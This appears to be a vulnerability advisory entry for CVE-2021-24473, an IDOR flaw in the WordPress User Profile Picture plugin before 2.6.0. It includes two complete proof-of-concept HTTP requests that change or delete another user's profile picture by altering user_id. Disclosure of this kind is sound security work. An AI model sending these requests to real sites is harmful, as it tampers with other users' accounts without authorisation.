Lucene search
Apple502jWPEX-ID:79982EA9-4733-4B1E-A43E-17629C1136DEHistoryJun 28, 2021 - 12:00 a.m.
User Profile Picture < 2.6.0 - Arbitrary User Picture Change/Deletion via IDOR
2021-06-2800:00:00
apple502j
111
arbitrary user picture change
idor vulnerability
profile picture
security exploit
burp suite.
EPSS
0.001
Percentile
30.5%
The plugin was affected by an IDOR issue, allowing users with the upload_image capability (by default author and above) to change and delete the profile pictures of other users (including those with higher roles).
Use a proxy such as Burp Suite to capture the request made when change your own profile picture, then tamper with the user_id parameter to change someone's else picture
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 89
Connection: close
Cookie: [author+]
action=metronet_add_thumbnail&post_id=1105&user_id=1&thumbnail_id=544&_wpnonce=b0db44185f
Same thing can be done to remove the profile picture of any user:
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 75
Connection: close
Cookie: [author+]
action=metronet_remove_thumbnail&post_id=1105&user_id=1&_wpnonce=b0db44185fRelated
cvelist
cvelist
prion
prion
Default credentials
2021-08-02 11:15:00
wpvulndb
wpvulndb
cve
cve
CVE-2021-24473
2021-08-02 11:15:10
nvd
nvd
CVE-2021-24473
2021-08-02 11:15:10